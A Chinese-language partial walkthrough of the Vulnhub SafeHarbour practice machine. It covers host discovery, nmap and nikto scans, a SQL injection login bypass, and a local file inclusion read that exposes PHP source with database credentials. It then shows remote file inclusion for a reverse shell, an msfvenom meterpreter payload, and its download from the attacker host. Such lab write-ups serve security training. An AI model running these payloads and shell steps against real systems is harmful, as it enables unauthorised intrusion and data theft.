Vulnhub之SafeHarbour靶机测试过程(部分)
SafeHarbour
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/SafeHarbour]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:f0:d6:f6 1 60 PCS Systemtechnik GmbH
192.168.56.216 08:00:27:c7:88:17 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.216
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/SafeHarbour]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.216 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-13 23:02 EDT
Nmap scan report for bogon (192.168.56.216)
Host is up (0.00020s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fc:c6:49:ce:9b:54:7f:57:6d:56:b3:0a:30:47:83:b4 (RSA)
| 256 73:86:8d:97:2e:60:08:8a:76:24:3c:94:72:8f:70:f7 (ECDSA)
|_ 256 26:48:91:66:85:a2:39:99:f5:9b:62:da:f9:87:4a:e6 (ED25519)
80/tcp open http nginx 1.17.4
|_http-title: Login
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: nginx/1.17.4
2375/tcp filtered docker
MAC Address: 08:00:27:C7:88:17 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.81 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http),2375为filtered状态
获得Shell
浏览器访问80端口,返回用户登录窗口:
虽然用admin' or 1=1 -- ,返回username or password incorrect的错误信息
用admin' or '1'='1即可登陆
──(kali㉿kali)-[~/Desktop/Vulnhub/SafeHarbour]
└─$ nikto -h http://192.168.56.216
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.216
+ Target Hostname: 192.168.56.216
+ Target Port: 80
+ Start Time: 2023-03-13 23:04:41 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.17.4
+ Retrieved x-powered-by header: PHP/7.2.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-03-13 23:05:36 (GMT-4) (55 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
http://192.168.56.216/OnlineBanking/index.php?p=php://filter/convert.base64-encode/resource=transfer
可以通过本地文件包含漏洞读取transfer文件内容
解码得到:
<?php
session_start();
if(is_null($_SESSION["loggedin"])){
header("Location: /");
}
$dbServer = mysqli_connect('mysql','root','TestPass123!', 'HarborBankUsers');
$user = $_SESSION["username"];
if($_POST['x']){
$recipient = $_POST['recipient'];
$amount = $_POST['amount'];
$currentBalanceQueryResult = mysqli_query($dbServer, "SELECT balance FROM users where username = '$user'");
$balanceRow = mysqli_fetch_row($currentBalanceQueryResult);
$balance = $balanceRow[0];
if($amount > 0 && $recipient != "Recipient"){
if($balance > $amount){
$recipientBalanceQueryResult = mysqli_query($dbServer, "SELECT balance FROM users where username = '$recipient'");
$recipientBalanceRow = mysqli_fetch_row($recipientBalanceQueryResult);
$recipientBalance = $recipientBalanceRow[0];
$recipientNewBalance = $recipientBalance + $amount;
$newBalance = $balance - $amount;
if($newBalanceDBCommit = mysqli_query($dbServer, "UPDATE users SET balance = '$newBalance' WHERE username = '$user'") && $recipientNewBalanceCommit = mysqli_query($dbServer, "UPDATE users SET balance = '$recipientNewBalance' WHERE username = '$recipient'")){
echo "<script type='text/javascript'>alert('Transfer Complete.');</script>";
}else{
echo "<script type = 'text/javascript'>alert('Transfer Error. Could not complete.');</script>";
}
}else{
echo "<script type = 'text/javascript'>alert('Insufficient Funds for Transfer. Transaction incomplete.');</script>";
}
}else{
echo "<script type = 'text/javascript'>alert('Check recipient and amount and try again.');</script>";
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Harbor Bank Online</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.css">
<style type="text/css">
.wrapper{ width: 350px; padding: 20px; margin: 0 auto;}
</style>
</head>
<body>
<h1>Harbor Bank Online</h1>
<nav class="navbar navbar-default">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="#"></a>
</div>
<ul class="nav navbar-nav">
<li><a href="index.php?p=welcome">Home</a></li>
<li><a href="index.php?p=balance">Balance</a></li>
<li class="active"><a href="index.php?p=transfer">Transfers</a></li>
<li><a href="index.php?p=account">My Account</a></li>
<li><a href="index.php?p=about">About</a></li>
<li><a href="index.php?p=logout" onclick="confirm('Are you sure you want to log out?')">Log Out</a></li>
</ul>
</div>
</nav>
<div class="wrapper" align="center">
<h4>Make a Transfer:</h4>
<body>
<br></br>
<br></br>
<form action="" method="post">
<div class="form-group">
<select class="form-control" name="recipient" placeholder="Recipient">
<option>Recipient</option>
<option>Admin</option>
<option>Bill</option>
<option>Steve</option>
<option>Timothy</option>
<option>Jill</option>
<option>Quinten</option>
</select>
<br></br>
<input class="form-control" type="number" placeholder="Amount" name="amount" step=".01">
<br></br>
<input type="submit" class="btn btn-primary" value="Submit" name="x">
</div>
</form>
</body>
得到数据库连接用户名和密码。
看是否有远程包含漏洞
文件名必须是about?奇怪!
192.168.56.216/OnlineBanking/index.php?p=http://192.168.56.146:8000/about
不需要扩展名.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/SafeHarbour]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.216] 58850
Linux 707af7b0d61f 4.15.0-65-generic #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019 x86_64 Linux
sh: w: not found
uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)
/bin/sh: can't access tty; job control turned off
/ $ id
uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)
/ $ which python
/ $ which python3
/ $ bash -i
/ $ /bin/sh: bash: not found
id
uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)
/tmp $ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
21: eth0@if22: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:14:00:08 brd ff:ff:ff:ff:ff:ff
inet 172.20.0.8/16 brd 172.20.255.255 scope global eth0
valid_lft forever preferred_lft forever
┌──(kali㉿kali)-[~/Desktop/Vulnhub/SafeHarbour]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.146 LPORT=4242 -f elf > reverseshell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
┌──(kali㉿kali)-[~/Desktop/Vulnhub/SafeHarbour]
└─$ ls
about.php linpeas.sh nmap_full_scan req.txt reverseshell.elf test
tmp $ wget http://192.168.56.146:8000/reverseshell.elf
Connecting to 192.168.56.146:8000 (192.168.56.146:8000)
reverseshell.elf 100% |*******************************| 207 0:00:00 ETA
STRIVE FOR PROGRESS,NOT FOR PERFECTION
